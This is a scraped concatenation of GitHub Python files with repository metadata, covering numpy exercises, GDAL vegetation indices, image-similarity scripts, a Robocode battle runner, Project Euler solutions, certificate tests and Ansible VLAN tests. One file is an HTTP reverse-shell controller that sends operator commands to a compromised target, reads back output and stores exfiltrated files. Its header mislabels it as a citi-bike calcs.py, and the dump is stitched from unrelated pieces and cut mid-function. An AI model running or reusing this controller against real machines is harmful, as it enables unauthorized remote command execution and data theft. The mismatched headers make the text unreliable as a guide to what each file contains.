EthanRosenthal/citi-bikecaster-model
|
calcs.py
|
calcs.py
|
py
| 4,374 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27646567910
|
import http.server
from colorama import Fore, Style
import os
import cgi
HOST_NAME = '127.0.0.1' # Kali IP address
PORT_NUMBER = 80 # Listening port number
class MyHandler(http.server.BaseHTTPRequestHandler): # MyHandler defines what we should do from the client / target
def do_GET(s):
# If we got a GET request, we will:-
s.send_response(200,message=None) # return HTML status 200 (OK)
s.send_header("Content-type", "text/html") # Inform the target that content type head
s.end_headers()
cmd = input(f"{Fore.LIGHTCYAN_EX}(Abuqasem)>{Style.RESET_ALL} ") # take user input
s.wfile.write(cmd.encode("utf-8")) # send the command which we got from the user input
def do_POST(s):
# If we got a POST, we will:-
s.send_response(200) # return HTML status 200 (OK)
s.end_headers()
length = int(s.headers['Content-Length']) # Define the length which means how many bytes
# value has to be integer
postVar = s.rfile.read(length) # Read then print the posted data
print(postVar.strip().decode("utf-8"), end="")
def getfile(s):
if s.path == '/store':
try:
ctype, pdict = cgi.parse_header(s.headers.getheader('content-type'))
if ctype == 'multipart/form-data':
fs = cgi.FieldStorage(fp=s.rfile,headers=s.headers,environ={'REQUEST_METHOD': 'POST'})
else:
print("[-] Unexpected POST request")
fs_up = fs['file']
with open('/proof.txt', 'wb') as o:
o.write(fs_up.file.read())
s.send_response(200)
s.end_headers()
except Exception as e:
print (e)
return
if __name__ == '__main__':
# We start a server_class and create httpd object and pass our kali IP,port number and cl
server_class = http.server.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
try:
print(f"{Fore.LIGHTGREEN_EX}(Listening on port)->[{PORT_NUMBER}]{Style.RESET_ALL}")
httpd.serve_forever() # start the HTTP server, however if we got ctrl+c we will Inter
except KeyboardInterrupt:
print(f"{Fore.RED}[!] Server is terminated{Style.RESET_ALL}")
httpd.server_close()
|
zAbuQasem/Misc
|
http reverse shell/Server.py
|
Server.py
|
py
| 2,367 |
python
|
en
|
code
| 6 |
github-code
|
6
|
9238631713
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 6 17:18:39 2019
@author: akshaf
"""
import numpy as np
data1 = [[1,2,3,4],[5,6,7,8],["ab","c","d","d"]]
print("data1",data1)
type(data1)
a = np.array(data1)
a
type(a) # This give numpy array
data1.__class__ # similar to type(data1) function
a.__class__ # similar to type(a) function
a.ndim # gives dimension of rows
a.shape # gives shape in the form of (row,column)
a.dtype # shows which all different datatypes are present in a
a1 = np.arange(15).reshape(3,5) # arrange will create a sequence and reshape will shape in (row,column) structure
a1
type(a1)
a1.ndim
a1.shape
a1.dtype
z= np.zeros((3,6))
z
a = np.arange(50)
a
a.ndim
a[0]
a[6] # 6th element
a[0:3] # first 3 elements
a[4:8] # 5th to 8th element
a[2:] # All elements that start from 2
a[:] # all elements from start to end
a[-3:] # last 3 ekements
a1 = np.arange(15).reshape(3,5)
a1
a1[0]
a1[1]
a1[2]
a1[1:]
a1[1][2]
|
akshafmulla/PythonForDataScience
|
Basics_of_Python/Code/16 Numpy.py
|
16 Numpy.py
|
py
| 936 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32312362218
|
from osgeo import gdal
import numpy as np
# calculating SAVI and NDVI
noDataVal = -28672
def calculate_ndvi(nir, red):
valid_mask = (nir != noDataVal) & (red != noDataVal)
ndvi_band = np.where(valid_mask, (nir - red) / (nir + red), np.nan)
return ndvi_band
# Function to calculate SAVI
def calculate_savi(nir, red):
soil_factor = 0.5
valid_mask = (nir != noDataVal) & (red != noDataVal)
savi_band = np.where(valid_mask,((1 + soil_factor) * (nir - red)) / (nir + red + soil_factor),np.nan)
return savi_band
def export_geotiff(src_dataset, band, output_path):
# Get the geotransform from the NIR dataset
geotransform = src_dataset.GetGeoTransform()
# Create the output GeoTIFF
driver = gdal.GetDriverByName('GTiff')
output_dataset = driver.Create(output_path, src_dataset.RasterXSize, src_dataset.RasterYSize, 1, gdal.GDT_Float32)
# Set the geotransform and projection
output_dataset.SetGeoTransform(geotransform)
output_dataset.SetProjection(src_dataset.GetProjection())
# Write the SAVI band to the output GeoTIFF
output_band = output_dataset.GetRasterBand(1)
output_band.WriteArray(band)
# Flush data to disk and close the output GeoTIFF
output_band.FlushCache()
output_dataset.FlushCache()
output_dataset = None
def export_savi_ndvi(nir_path, red_path):
savi_output_path = nir_path.replace("nir", "savi")
ndvi_output_path = nir_path.replace("nir", "ndvi")
# Open NIR and red GeoTIFF files
nir_dataset = gdal.Open(nir_path)
red_dataset = gdal.Open(red_path)
# Read NIR and red bands as NumPy arrays
nir_band = nir_dataset.GetRasterBand(1).ReadAsArray()
red_band = red_dataset.GetRasterBand(1).ReadAsArray()
savi_band = calculate_savi(nir_band, red_band)
ndvi_band = calculate_ndvi(nir_band, red_band)
export_geotiff(nir_dataset, savi_band, savi_output_path)
export_geotiff(nir_dataset, ndvi_band, ndvi_output_path)
print('exported', savi_output_path)
print('exported', ndvi_output_path)
# Paths to NIR and red GeoTIFF files
# nir_path = r'C:\Users\dusti\Desktop\GCERlab\ET_goes16\download_goes\datasets\images\goes\goes16\geonexl2\geotiffs\h14v04\2018\001\1600\nir_GO16_ABI12B_20180011600_GLBG_h14v04_02_proj.tif'
# red_path = r'C:\Users\dusti\Desktop\GCERlab\ET_goes16\download_goes\datasets\images\goes\goes16\geonexl2\geotiffs\h14v04\2018\001\1600\red_GO16_ABI12B_20180011600_GLBG_h14v04_02_proj.tif'
# nir_path = r'C:\Users\dnv22\Desktop\ET_goes16\download_goes\datasets\images\goes\goes16\geonexl2\geotiffs\h14v04\2018\001\1600\nir_GO16_ABI12B_20180011600_GLBG_h14v04_02_proj.tif'
# red_path= r'C:\Users\dnv22\Desktop\ET_goes16\download_goes\datasets\images\goes\goes16\geonexl2\geotiffs\h14v04\2018\001\1600\red_GO16_ABI12B_20180011600_GLBG_h14v04_02_proj.tif'
# export_savi_ndvi(nir_path, red_path)
|
dustnvan/ET_goes16
|
goes_export_geotiff/export_savi_ndvi.py
|
export_savi_ndvi.py
|
py
| 2,866 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10389322209
|
import glob
import os
from os import path as op
import cv2
import numpy as np
from torch.utils.data import DataLoader
from pathlib import Path
from PIL import Image, ImageFilter
from detection.dummy_cnn.dataset import BaseBillOnBackGroundSet
from tqdm import tqdm
from sewar.full_ref import sam as sim_measure
from itertools import combinations, product
import time
from matplotlib import pyplot as plt
from multiprocessing import Pool
import pandas as pd
repo = Path(os.getcwd())
im_dir_gen = os.path.join(repo, "processed_data", "genbills")
im_dir_real = os.path.join(repo, "processed_data", "realbills")
im_dir_unseen = os.path.join(repo, "processed_data", "realbills", "unseen")
def resize(list_of_images, size):
outp = []
for im in tqdm(list_of_images):
copy = im.copy()
copy.thumbnail(size=(size, size), resample=Image.ANTIALIAS)
if copy.width > copy.height:
copy = copy.rotate(90, fillcolor=(0,), expand=True)
outp.append(copy)
return outp
def combs_self(list_of_images):
return np.array(list(combinations(range(len(list_of_images)), r=2))).astype(int)
def combs_between(list_of_images1, list_of_images2):
return np.array(list(product(range(len(list_of_images1)), range(len(list_of_images2))))).astype(int)
def simil(pair): # subfunction to put in parallel loop
im_1, im_2 = pair
m = ""
if im_1.width != im_2.width or im_1.height != im_2.height:
m = f"crop happened\n im1 dims = {im_1.width},{im_1.height},\n im2 dims = {im_2.width},{im_2.height}"
min_w = min(im_1.width, im_2.width)
min_h = min(im_1.height, im_2.height)
im_1 = im_1.crop((1, 1, min_w-1, min_h-1))
im_2 = im_2.crop((1, 1, min_w-1, min_h-1))
m+= f"\n crop dims = 1to{min_w-1}, 1to{min_h-1}"
m+= f"\n final dims = {im_1.width},{im_1.height}"
try:
score = sim_measure(np.array(im_1), np.array(im_2))
except Exception as e:
score = 0.5
print(e)
print(m)
return score
def similarity(list_of_images1, list_of_images2, combs):
similarity_score = 0
list_of_images1 = [list_of_images1[idx] for idx in combs[:,0]]
list_of_images2 = [list_of_images2[idx] for idx in combs[:,1]]
with Pool(12) as pool:
for score in tqdm(pool.imap(simil, zip(list_of_images1, list_of_images2)), total=len(list_of_images1)):
similarity_score += score
pool.close()
similarity_score /= len(combs)
return similarity_score
def edgin(image): #task function to put in Pool loop
corners = cv2.goodFeaturesToTrack(np.array(image.convert("L")), int(1e+6), 1e-6, 1e-6)
return len(corners)
def edginess(list_of_images):
score = 0
with Pool(12) as pool:
for corners in tqdm(pool.imap(edgin, list_of_images), total=len(list_of_images)):
score += corners
score /= len(list_of_images)
return score
# This script is meant do discover which size for training corner_cnn is the best
generated_images = BaseBillOnBackGroundSet(image_dir=im_dir_gen)
loader = DataLoader(dataset=generated_images,
batch_size=1,
num_workers=12,
shuffle=True)
temp = []
for im, _ in tqdm(loader, total=200):
im = im[0].numpy()
where_0 = np.sum(im, axis=2) > 0
for row, element in enumerate(where_0):
if np.all(element == 0): break
for col, element in enumerate(where_0.T):
if np.all(element == 0): break
im = im[:row, :col, :]
try:
temp.append(Image.fromarray(im))
except:
print("Error occured")
if len(temp) == 200: break
generated_images = temp
real_images = glob.glob(op.join(im_dir_real, "*.jpg"), recursive=False)
real_images = [Image.open(file) for file in real_images if not "mask" in file]#[:8]
test_images = glob.glob(op.join(im_dir_unseen, "*.jpg"), recursive=False)
test_images = [Image.open(file) for file in test_images if not "mask" in file]#[:8]
sizes = np.geomspace(1000, 10, 100).astype(int)
scores = {'sim_gen': [],
'sim_real': [],
'sim_test': [],
'sim_gen_vs_real': [],
'sim_gen_vs_test': [],
'sim_test_vs_real': [],
"edg_gen": [],
"edg_real": [],
"edg_test": []}
print("#" * 100)
print()
for size in sizes:
images_of_size = {"gen": [], "real": [], "test": []}
print(f"Resizing {size}")
images_of_size['gen'] = resize(generated_images, size)
images_of_size['real'] = resize(real_images, size)
images_of_size['test'] = resize(test_images, size)
time.sleep(2)
print(f"\nCollect similarity inside every set {size}")
for k in images_of_size.keys():
sim = similarity(list_of_images1=images_of_size[k],
list_of_images2=images_of_size[k],
combs=combs_self(images_of_size[k]))
scores[f'sim_{k}'].append(sim)
time.sleep(2)
print(f"\nCollect similarity inbetween sets {size}")
for k_pair in [("gen", "real"), ("gen", "test"), ("test", "real")]:
sim = similarity(list_of_images1=images_of_size[k_pair[0]],
list_of_images2=images_of_size[k_pair[1]],
combs=combs_between(list_of_images1=images_of_size[k_pair[0]],
list_of_images2=images_of_size[k_pair[1]]))
scores[f'sim_{k_pair[0]}_vs_{k_pair[1]}'].append(sim)
time.sleep(2)
print(f"\nCollect edginess of every set {size}")
for k in images_of_size.keys():
edg = edginess(list_of_images=images_of_size[k])
scores[f'edg_{k}'].append(edg)
time.sleep(2)
# plotting current results
num_el = len(scores["sim_gen"])
f, ax = plt.subplots(nrows=3, ncols=1, figsize=(10, 15))
ax[0].set_title("Dissimilarity of images within each set")
ax[0].set_xlabel("Size of image")
ax[0].plot(sizes[:num_el][::-1], scores["sim_gen"][::-1], label="generated images", c="red")
ax[0].plot(sizes[:num_el][::-1], scores["sim_real"][::-1], label="real images", c="blue")
ax[0].plot(sizes[:num_el][::-1], scores["sim_test"][::-1], label="test images", c="blue", ls=":")
ax[1].set_title("Dissimilarity of images between sets")
ax[1].set_xlabel("Size of image")
ax[1].plot(sizes[:num_el][::-1], scores["sim_gen_vs_real"][::-1], label="generated vs real images", c="blue")
ax[1].plot(sizes[:num_el][::-1], scores["sim_gen_vs_test"][::-1], label="generated vs test images", c="blue", ls=":")
ax[1].plot(sizes[:num_el][::-1], scores["sim_test_vs_real"][::-1], label="real vs test images", c="green")
ax[2].set_title("Number of corners detected of images within each set")
ax[2].set_xlabel("Size of image")
ax[2].plot(sizes[:num_el][::-1], scores["edg_gen"][::-1], label="generated images", c="red")
ax[2].plot(sizes[:num_el][::-1], scores["edg_real"][::-1], label="real images", c="blue")
ax[2].plot(sizes[:num_el][::-1], scores["edg_test"][::-1], label="test images", c="blue", ls=":")
ax[2].set_yscale('log')
for a in ax:
a.legend()
a.grid(axis="x", which="both")
a.invert_xaxis()
a.set_xscale('log')
plt.tight_layout()
plt.savefig("/home/sasha/Documents/BachelorsProject/Repo/real_bills_results/comp_sizes/0_stats.png", dpi=150)
plt.close("all")
# save examples of images
images_of_size['gen'][0].save(f"/home/sasha/Documents/BachelorsProject/Repo/real_bills_results/comp_sizes/generated_{size}.png")
images_of_size['real'][0].save(f"/home/sasha/Documents/BachelorsProject/Repo/real_bills_results/comp_sizes/real_{size}.png")
images_of_size['test'][0].save(f"/home/sasha/Documents/BachelorsProject/Repo/real_bills_results/comp_sizes/test_{size}.png")
#save scores
frame = pd.DataFrame(scores)
frame.set_index(sizes[:num_el], inplace=True)
frame.to_csv(f"/home/sasha/Documents/BachelorsProject/Repo/real_bills_results/comp_sizes/0_scores.csv", sep=";")
print("#" * 100)
|
KaraLandes/BachelorsProject
|
Repo/compare_data_similarity.py
|
compare_data_similarity.py
|
py
| 8,019 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23396456749
|
'''
locals() 函数会以字典类型返回当前位置的全部局部变量。
对于函数, 方法, lambda 函式, 类, 以及实现了 __call__ 方法的类实例, 它都返回 True。
语法
locals() 函数语法:
locals()
参数
无
返回值
返回字典类型的局部变量
1 不要修改locals()返回的字典中的内容;改变可能不会影响解析器对局部变量的使用。
2 在函数体内调用locals(),返回的是自由变量。修改自由变量不会影响解析器对变量的使用。
3 不能在类区域内返回自由变量。
'''
def test_py(arg):
z=1
print(locals())
test_py(6) #输出 {'z': 1, 'arg': 6}
def foo(arg, a):
x = 100
y = 'hello python!'
for i in range(10):
j = 1
k = i
print(locals())
foo(1, 2) #输出 {'k': 9, 'j': 1, 'i': 9, 'y': 'hello python!', 'x': 100, 'a': 2, 'arg': 1}
#参考博客 https://blog.csdn.net/sxingming/article/details/52061630
|
tyutltf/Python_funs
|
locals函数详解.py
|
locals函数详解.py
|
py
| 952 |
python
|
zh
|
code
| 20 |
github-code
|
6
|
71345155708
|
#!/usr/bin/env python
import unittest
import copy
from ct.cert_analysis import base_check_test
from ct.cert_analysis import extensions
from ct.crypto.asn1 import oid
from ct.crypto.asn1 import types
from ct.crypto import cert
def remove_extension(certificate, ex_oid):
# If given extension exists in certificate, this function will remove it
extensions = certificate.get_extensions()
for i, ext in enumerate(extensions):
if ext["extnID"] == ex_oid:
del extensions[i]
break
def set_extension_criticality(certificate, ex_oid, value):
extensions = certificate.get_extensions()
for ext in extensions:
if ext["extnID"] == ex_oid:
ext["critical"] = types.Boolean(value)
CORRECT_LEAF = cert.Certificate.from_pem_file("ct/crypto/testdata/youtube.pem")
CORRECT_CA = cert.Certificate.from_pem_file("ct/crypto/testdata/subrigo_net.pem")
CORRECT_SUBORDINATE = cert.Certificate.from_pem_file("ct/crypto/testdata/"
"verisign_intermediate.pem")
class ExtensionsTest(base_check_test.BaseCheckTest):
def test_good_leaf_cert(self):
check = extensions.CheckCorrectExtensions()
result = check.check(CORRECT_LEAF)
self.assertEqual(len(result), 0)
def test_good_ca_cert(self):
check = extensions.CheckCorrectExtensions()
result = check.check(CORRECT_CA)
self.assertEqual(len(result), 0)
def test_good_subordinate_cert(self):
check = extensions.CheckCorrectExtensions()
result = check.check(CORRECT_SUBORDINATE)
self.assertEqual(len(result), 0)
def test_ca_missing_extension(self):
certificate = copy.deepcopy(CORRECT_CA)
remove_extension(certificate, oid.ID_CE_BASIC_CONSTRAINTS)
check = extensions.CheckCorrectExtensions()
result = check.check(certificate)
self.assertObservationIn(
extensions.LackOfRequiredExtension(extensions._ROOT,
extensions._oid_to_string(
oid.ID_CE_BASIC_CONSTRAINTS)),
result)
self.assertEqual(len(result), 1)
if __name__ == '__main__':
unittest.main()
|
kubeup/archon
|
vendor/github.com/google/certificate-transparency/python/ct/cert_analysis/extensions_test.py
|
extensions_test.py
|
py
| 2,258 |
python
|
en
|
code
| 194 |
github-code
|
6
|
33229423614
|
# For each cylinder in the scan, find its ray and depth.
# 03_c_find_cylinders
# Claus Brenner, 09 NOV 2012
from pylab import *
from lego_robot import *
# Find the derivative in scan data, ignoring invalid measurements.
def compute_derivative(scan, min_dist):
jumps = [ 0 ]
for i in xrange(1, len(scan) - 1):
l = scan[i-1]
r = scan[i+1]
if l > min_dist and r > min_dist:
derivative = (r - l) / 2.0
jumps.append(derivative)
else:
jumps.append(0)
jumps.append(0)
return jumps
# For each area between a left falling edge and a right rising edge,
# determine the average ray number and the average depth.
def find_cylinders(scan, scan_derivative, jump, min_dist):
cylinder_list = []
on_cylinder = False
sum_ray, sum_depth, rays = 0.0, 0.0, 0
for i in xrange(len(scan_derivative)):
# --->>> Insert your cylinder code here.
# Whenever you find a cylinder, add a tuple
# (average_ray, average_depth) to the cylinder_list.
# If I find a strong negative value for the derivative
# then you have found a landmark's left edge. See Scan0.png for visual reference.
if(scan_derivative[i] < -jump):
on_cylinder = True
rays = 0
sum_ray = 0.0
sum_depth = 0
# Each time you detect a landmark's right edge two consecutive values for the derivative
# above the detection threshold appear. Only the first derivative value is valid and is
# assocciated with the last suitable laser beam of the current analyzed scan.
elif(scan_derivative[i] > jump and on_cylinder):
on_cylinder = False
# Add the values assocciated to the laser
# beam that detects the landmark's right edge.
rays += 1
sum_ray += i
sum_depth += scan[i]
cylinder_list.append((sum_ray/rays, sum_depth/rays))
if(on_cylinder and scan[i] > min_dist):
rays += 1
sum_ray += i
sum_depth += scan[i]
return cylinder_list
if __name__ == '__main__':
minimum_valid_distance = 20.0
depth_jump = 100.0
# Read the logfile which contains all scans.
logfile = LegoLogfile()
logfile.read("robot4_scan.txt")
# Pick one scan.
scan = logfile.scan_data[8]
# Find cylinders.
der = compute_derivative(scan, minimum_valid_distance)
cylinders = find_cylinders(scan, der, depth_jump, minimum_valid_distance)
# Plot results.
plot(scan)
scatter([c[0] for c in cylinders], [c[1] for c in cylinders],
c='r', s=200)
show()
|
jfrascon/SLAM_AND_PATH_PLANNING_ALGORITHMS
|
01-GETTING_STARTED/CODE/slam_03_c_find_cylinders_question.py
|
slam_03_c_find_cylinders_question.py
|
py
| 2,747 |
python
|
en
|
code
| 129 |
github-code
|
6
|
31282202503
|
# pylint: disable=missing-docstring
# pylint: disable=invalid-name
import functools
import re
# import unicodedata
from string import punctuation as PUNCTUATIONS
import numpy as np
from doors.dates import get_timestamp
SPECIAL_PUNCTUATIONS = PUNCTUATIONS.replace("_", "")
def not_is_feat(col):
return not is_feat(col)
def is_feat(col):
return "feat:" in col
def clean_string(string):
return string.lower().rstrip().replace(" ", "_").replace("'", "")
def to_lowercase(strings):
strings = [string.lower() for string in strings]
return strings
def get_pronounceable_name():
consonants = ["b", "d", "f", "g", "h", "j", "k", "l", "m", "n", "p", "r", "s", "t"]
vowels = ["a", "e", "i", "o", "u"]
final_consonants = ["b", "f", "k", "l", "m", "n", "r", "s", "t"]
return (
np.random.choice(consonants)
+ np.random.choice(vowels)
+ np.random.choice(consonants)
+ np.random.choice(vowels)
+ np.random.choice(final_consonants)
)
def get_unique_id():
"""Pronounceable hash to be pronounced more or less ecclesiastically.
More details: https://www.ewtn.com/expert/answers/ecclesiastical_latin.htm
"""
return get_pronounceable_name() + "_" + get_timestamp("%y%m%d_%H%M%S")
def add_as_strings(*args, **kwargs):
result = args[0].astype(str)
sep = kwargs.get("sep")
if sep:
seperator = np.repeat(sep, len(result))
else:
seperator = None
for arr in args[1:]:
if seperator is not None:
result = _add_strings(result, seperator)
result = _add_strings(result, arr.astype(str))
return result
def _add_strings(v, w):
return np.core.defchararray.add(v, w)
def camelcase_to_underscore(string):
s1 = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", string)
return re.sub("([a-z0-9])([A-Z])", r"\1_\2", s1).lower()
def remove_punctuation(string):
for punctuation in SPECIAL_PUNCTUATIONS:
string = string.replace(punctuation, "")
return string
# def utf_to_ascii(string):
# uni_string = unicode(string, "utf")
# ascii_string = unicodedata.normalize("NFKD", uni_string).encode("ascii", "ignore")
# return ascii_string
def is_ascii(string):
try:
string.decode("ascii")
return True
except UnicodeDecodeError:
return False
def as_string(obj):
if hasattr(obj, "__name__"):
representation = obj.__name__
elif isinstance(obj, functools.partial):
representation = _get_partial_representation(obj)
elif hasattr(obj, "__dict__"):
representation = get_class_representation(obj)
elif hasattr(obj, "__name__"):
representation = obj.__name__
else:
representation = str(obj)
return representation
def _get_partial_representation(obj):
func_rep = as_string(obj.func)
input_rep = "func=" + func_rep
if _args_provided(obj):
arg_rep = _get_arg_representation(obj.args)
input_rep += ", " + arg_rep
if _kwargs_provided(obj):
kwarg_rep = get_dict_string_representation(obj.keywords)
input_rep += ", " + kwarg_rep
partial_rep = "partial({})".format(input_rep)
return partial_rep
def _kwargs_provided(obj):
return len(obj.keywords) > 0
def _args_provided(obj):
return len(obj.args) > 0
def _get_arg_representation(args):
return ", ".join([str(arg) for arg in args])
def get_class_representation(obj):
joint_str_rep = get_dict_string_representation(obj.__dict__)
cls_name = obj.__class__.__name__
return "{}({})".format(cls_name, joint_str_rep)
def get_dict_string_representation(dct):
str_rep = []
for key, value in dct.items():
if key[0] != "_":
value_representation = as_string(value)
str_rep.append("{}={}".format(key, value_representation))
joint_str_rep = ", ".join(str_rep)
return joint_str_rep
def convert_camelcase(camelcase):
"""
Credit to:
http://stackoverflow.com/questions/1175208/elegant-python-function-to-convert-
camelcase-to-snake-case
"""
s1 = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", camelcase)
return re.sub("([a-z0-9])([A-Z])", r"\1_\2", s1).lower()
def clean_white_space(array):
array = np.array([_clean_white_space(i) for i in array])
return array
def _clean_white_space(v):
if isinstance(v, str):
v = v.strip(" ")
return v
|
chechir/doors
|
doors/strings.py
|
strings.py
|
py
| 4,406 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8963786234
|
#!/usr/bin/env python3
import multiprocessing
from queue import Empty
import subprocess
import Robocode
import os, os.path
from datetime import datetime
import sys
import time
# This class knows about Robocode and the Database.
def recommendedWorkers():
cpus = multiprocessing.cpu_count()
if cpus > 12:
return cpus-2
elif cpus > 6:
return cpus-1
else:
return cpus
def BattleWorker( robocode, battledb, job_q, result_q ):
print('[{who}] Started:\n {db}\n {robo}'.format(
who = multiprocessing.current_process().name,
db = battledb,
robo = robocode
), file=sys.stderr)
try:
while True:
battle = job_q.get()
if battle.__class__ != Robocode.Battle:
# sentinel: no more jobs
print('[{0}] EndOfWork!'.format(
multiprocessing.current_process().name,
), file=sys.stderr)
break
start_time = datetime.now()
try:
battledb.MarkBattleRunning(battle.id)
print('[{who}] Running battle {id} between: {comps}'.format(
who = multiprocessing.current_process().name,
id = battle.id,
comps = ' '.join(battle.competitors),
), file=sys.stderr)
battle.run()
print('[{who}] Finished: {id}'.format(
who = multiprocessing.current_process().name,
id = battle.id,
), file=sys.stderr)
except subprocess.CalledProcessError as e:
print('[{who}] Battle invocation fails: {exc}\n{output}'.format(
who = multiprocessing.current_process().name,
exc = e.cmd,
output = e.output,
), file=sys.stderr)
if not battle.error:
# Only record the data if the battle succeeded.
battledb.BattleCompleted(battle.id,
battle.dbData(),
battle.result.dbData())
elapsed = datetime.now() - start_time
result_q.put(battle.id)
except Exception as e:
print('[{who}] Exception: {exc}'.format(
who = multiprocessing.current_process().name,
exc = e,
), file=sys.stderr)
raise e
print('[{0}] Finished!'.format(
multiprocessing.current_process().name,
), file=sys.stderr)
class BattleRunner:
def __init__( self, battledb, robocode, maxWorkers=None ):
self.battledb = battledb
self.robocode = robocode
self.job_q = multiprocessing.JoinableQueue()
self.result_q = multiprocessing.JoinableQueue()
self.workers = maxWorkers if maxWorkers is not None else recommendedWorkers()
self.job_count = 0
def start( self ):
# Start the workers.
self.pool = [ multiprocessing.Process( target = BattleWorker,
args=(self.robocode, self.battledb,
self.job_q, self.result_q) )
for i in range(self.workers) ]
for p in self.pool:
p.start()
def finish( self ):
print('[{0}] Sending EndOfWork signals'.format(
multiprocessing.current_process().name,
), file=sys.stderr)
for p in self.pool:
self.job_q.put(0)
# Consume everything in the result_q
while self.job_count > 0:
battleid = self.result_q.get()
self.job_count -= 1
for p in self.pool:
p.join()
def submit( self, battle ):
print('[{0}] Submitting battle #{1} '.format(
multiprocessing.current_process().name,
battle.id,
), file=sys.stderr)
self.job_q.put(battle)
self.job_count += 1
def running(self):
'''
check to see if any of the workers are still running
'''
for p in self.pool:
if p.is_alive():
return True
return False
def getResults(self):
'''
check to see if there are any results
'''
results = []
try:
results.append(self.result_q.get_nowait())
except Empty:
pass
return results
|
mojomojomojo/di-arena
|
lib/BattleRunner.py
|
BattleRunner.py
|
py
| 4,617 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34688027576
|
#!/usr/bin/python
def modular_helper(base, exponent, modulus, prefactor=1):
c = 1
for k in range(exponent):
c = (c * base) % modulus
return ((prefactor % modulus) * c) % modulus
def fibN(n):
phi = (1 + 5 ** 0.5) / 2
return int(phi ** n / 5 ** 0.5 + 0.5)
# Alternate problem solutions start here
def problem0012a():
p = primes(1000)
n, Dn, cnt = 3, 2, 0
while cnt <= 500:
n, n1 = n + 1, n
if n1 % 2 == 0:
n1 = n1 // 2
Dn1 = 1
for pi in p:
if pi * pi > n1:
Dn1 = 2 * Dn1
break
exponent = 1
while n1 % pi == 0:
exponent += 1
n1 = n1 / pi
if exponent > 1:
Dn1 = Dn1 * exponent
if n1 == 1:
break
cnt = Dn * Dn1
Dn = Dn1
return (n - 1) * (n - 2) // 2
def problem0013a():
with open('problem0013.txt') as f:
s = f.readlines()
return int(str(sum(int(k[:11]) for k in s))[:10])
# solution due to veritas on Project Euler Forums
def problem0014a(ub=1000000):
table = {1: 1}
def collatz(n):
if not n in table:
if n % 2 == 0:
table[n] = collatz(n // 2) + 1
elif n % 4 == 1:
table[n] = collatz((3 * n + 1) // 4) + 3
else:
table[n] = collatz((3 * n + 1) // 2) + 2
return table[n]
return max(xrange(ub // 2 + 1, ub, 2), key=collatz)
# 13 -> 40 -> 20 -> 10 -> 5 -> 16 -> 8 -> 4 -> 2 -> 1
# 13 -(3)-> 10 -(1)-> 5 -(3)-> 4 -(1)-> 2 -(1)-> 1
def veritas_iterative(ub=1000000):
table = {1: 1}
def collatz(n):
seq, steps = [], []
while not n in table:
seq.append(n)
if n % 2 and n % 4 == 1:
n, x = (3 * n + 1) // 4, 3
elif n % 2:
n, x = (3 * n + 1) // 2, 2
else:
n, x = n // 2, 1
steps.append(x)
x = table[n]
while seq:
n, xn = seq.pop(), steps.pop()
x = x + xn
table[n] = x
return x
return max(xrange(ub // 2 + 1, ub, 2), key=collatz)
def problem0026a(n=1000):
return max(d for d in primes(n)
if not any(10 ** x % d == 1 for x in range(1, d - 1)))
def problem0031a():
def tally(*p):
d = (100, 50, 20, 10, 5, 2, 1)
return 200 - sum(k * v for k, v in zip(p, d))
c = 2
for p100 in range(2):
mp50 = int(tally(p100) / 50) + 1
for p50 in range(mp50):
mp20 = int(tally(p100, p50) / 20) + 1
for p20 in range(mp20):
mp10 = int(tally(p100, p50, p20) / 10) + 1
for p10 in range(mp10):
mp5 = int(tally(p100, p50, p20, p10) / 5) + 1
for p5 in range(mp5):
mp2 = int(tally(p100, p50, p20, p10, p5) / 2) + 1
for p2 in range(mp2):
c += 1
return c
def problem0089a():
n2r = [(1000, 'M'), (900, 'CM'), (500, 'D'), (400, 'CD'),
(100, 'C'), (90, 'XC'), (50, 'L'), (40, 'XL'),
(10, 'X'), (9, 'IX'), (5, 'V'), (4, 'IV'), (1, 'I')]
r2n = {b: a for a, b in n2r}
def to_roman(x):
s = []
while x:
n, c = next((n, c) for n, c in n2r if x >= n)
s.append(c)
x = x - n
return ''.join(s)
def from_roman(r):
k, s = 0, 0
while k < len(r):
if r[k] not in ('I', 'X', 'C') or k == len(r) - 1:
s = s + r2n[r[k]]
elif r[k:k+2] in r2n:
s = s + r2n[r[k:k+2]]
k = k + 1
else:
s = s + r2n[r[k]]
k = k + 1
return s
return sum(len(r) - len(to_roman(from_roman(r)))
for r in data.readRoman())
def problem0097a():
# Note 7830457 = 29 * 270015 + 22
# (10 ** 10 - 1) * 2 ** 29 does not overflow a 64 bit integer
p, b, e = 28433, 2, 7830457
d, m = divmod(e, 29)
prefactor = 28433 * 2 ** m
return modular_helper(2 ** 29, 270015, 10 ** 10, 28433 * 2 ** m) + 1
|
pkumar0508/project-euler
|
alternate_solutions.py
|
alternate_solutions.py
|
py
| 4,179 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40409186941
|
#!/usr/bin/env python3
# unit_test/cisco/nxos/unit_test_nxos_vlan.py
our_version = 107
from ask.common.playbook import Playbook
from ask.common.log import Log
from ask.cisco.nxos.nxos_vlan import NxosVlan
ansible_module = 'nxos_vlan'
ansible_host = 'dc-101' # must be in ansible inventory
log = Log('unit_test_{}'.format(ansible_module), 'INFO', 'DEBUG')
def playbook():
pb = Playbook(log)
pb.profile_nxos()
pb.ansible_password = 'mypassword'
pb.file = '/tmp/{}.yaml'.format(ansible_module)
pb.name = '{} task'.format(ansible_module)
pb.add_host(ansible_host)
return pb
def add_task_name(task):
task.append_to_task_name('v{}, {}'.format(our_version, ansible_host))
for key in sorted(task.scriptkit_properties):
task.append_to_task_name(key)
def add_task(pb):
task = NxosVlan(log)
task.admin_state = 'up'
task.delay = 20
task.interfaces = ['Ethernet1/7', 'Ethernet1/8']
task.name = "my_vlan_2001"
task.mapped_vni = 20001
task.state = 'present'
task.vlan_id = 2001
task.vlan_state = 'active'
add_task_name(task)
task.commit()
pb.add_task(task)
def add_aggregate_task(pb):
task = NxosVlan(log)
task.admin_state = 'up'
task.delay = 20
task.interfaces = ['Ethernet1/9', 'Ethernet1/10']
task.name = "my_vlan_2002"
task.mapped_vni = 20002
task.state = 'present'
task.vlan_id = 2002
task.vlan_state = 'active'
